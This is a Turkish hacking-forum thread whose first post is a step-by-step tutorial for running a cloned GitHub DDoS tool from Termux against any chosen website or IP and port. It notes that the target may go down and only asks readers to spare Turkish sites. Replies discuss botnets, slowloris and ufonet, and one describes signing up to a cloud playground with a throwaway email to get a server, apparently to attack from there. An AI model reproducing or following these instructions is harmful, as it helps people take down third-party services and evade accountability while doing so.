Termux Ddos Attack

İmmortalTürk1

Katılımcı Üye
17 Ocak 2019
414
24
Merhaba arkadaşlar. Bugun size termuxdan ddos atmayı göstereceğim. Ddos nedir peki?
Dağıtılmış Ağ Saldırıları, genellikle Dağıtılmış Hizmet Reddi (DDoS) saldırıları adıyla bilinir.

DDoS saldırısı, saldırıya uğrayan web kaynağına birden çok istek göndererek web sitesinin çok sayıda isteği işleme kapasitesini aşmayı ve doğru şekilde çalışmasını engellemeyi amaçlar.

TERMUXDAN DDOS SALDIRISI

Toolumuzun adı DDos-Attack. Belirlediğiniz siteye veya ip adresine ddos atabilirsiniz bu tool ile.

Kurulumuna geçelim.

Git modülümüzü indirelim
Kod:
pkg install git

Tu4SBo.jpg

Python2 indirelim
Kod:
pkg install python2

Mi6Xli.jpg

Toolumuzu indirelim
Kod:
git clone https://github.com/Techtushar07/DDos-Attack.git

QZ4mNA.jpg

Tool dosyalarımıza girelim
Kod:
cd DDos-Attack

Uge3Lv.jpg

Toolu çalıştıracağımız dosyaya yetki verelim
Ve Tool dosyamıza yetki verilmiş mi kontrol edelim. Yeşil renkte olması lazım. Dosyaları görüntüleyelim.

Kod:
[COLOR="Lime"]chmod +x ddos-attack.py[/COLOR]
Kod:
ls

86I3c7.jpg

Toolumuzu çalıştıralım
Kod:
python2 ddos-attack.py

dHwdtM.jpg

Evet gördüğünüz gibi tool çalıştı. İsterseniz site adı isterseniz site ip adresini yazabilirsiniz.

Port olarak herhangi Bir Port yazabilirsiniz.

Cv3x46.jpg

Gördüğünüz gibi saldırı başladı. Hedef siteye toplu halde ddos atarsanız site down olabilir.

MlLCpr.jpg

Türk siteleri üzerinde denemeyiniz. Hiç bir sorumluluk kabul etmiyorum. Okuduğunuz için teşekkür ederim. İyi formlar.

5 Tem 2019
97
1
komik çünkü termuxdan bahsediyosun hiç bir işe yaramaz ve en önemlisi internet hızı adamlar 500 kişilik botnet kuruyo canavar pc lerle slowloris ddos atıyo aylarca ufonet ddos çalıştırıyo en önemlisi adamlar server üzerinden ddos atıyo server internet hızı saniyede 146-720-1360 mb arası değişiyo ama ev inteneti saniyede 05-1,5 arası ddos için minumum 4 gb ram i3 gpu s/3 mb internet hızı kali/parrot/blackarch linux lazım ve bu sistemle en işlevli ddos ufonet ile yapılır ddos dediğim en fazla resturant/mağaza/spor salonu siteleri kötü kodlanmış acemi bireylerin siteleri ve güçsüz siteler için tehdit oluşturur

LASKARİS

Yeni üye
2 Tem 2023
12
0
Hocam ellerinize sağlık ancak sadece sitenin ip adresini kabul ediyor nasıl bulacağız sitenin ip adresini

Criminal Laoin

Uzman üye
26 Mar 2021
1,046
832
Луна
Hocam vpn bağlayıp bu tool ile saldırdığımda kendime saldırmıyorum ve bunu bir arkadaş kali de olacak galiba test ettiğinde 1m çıkmış
Yapma onu sana aşağıda verdiğimi dene vds veriyor

1- Ubuntu | Playgrounds | Killercoda adresine gidin.
2- Sign into Killercoda bölümünden tempmail ile geçici mail alın ve kayıt olun
3- Terminale "docker run -p 8080:80 -v /dev/shm:/dev/shm dorowu/ubuntu-desktop-lxde-vnc" yazın.
4- 3 çizgiden Traffic / Ports ' a basın açılan sayfada Common Ports altındaki 8080 'e basın.
5- aşağıdaki kodu terminale girin
apt-get update

LASKARİS

Yeni üye
2 Tem 2023
12
0
Yapma onu sana aşağıda verdiğimi dene vds veriyor

1- Ubuntu | Playgrounds | Killercoda adresine gidin.
2- Sign into Killercoda bölümünden tempmail ile geçici mail alın ve kayıt olun
3- Terminale "docker run -p 8080:80 -v /dev/shm:/dev/shm dorowu/ubuntu-desktop-lxde-vnc" yazın.
4- 3 çizgiden Traffic / Ports ' a basın açılan sayfada Common Ports altındaki 8080 'e basın.
5- aşağıdaki kodu terminale girin
apt-get update
Hocam teşekkür ediyorum ancak terminali nereden bulacağım siz bana telegramınızı verin hocam SS atayım

Rebelkan

Blue Team Lider Yrd.
12 Şub 2019
1,947
887
Termuxla atılan ddosla bırak site çökertmeyi, modem bile çökerteni ne duydum ne gördüm. Kendi modemini vurmaktan başka bir işe yaramaz. Konu için emek vermişsin o yüzden eline sağlık.

İyi forumlar

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.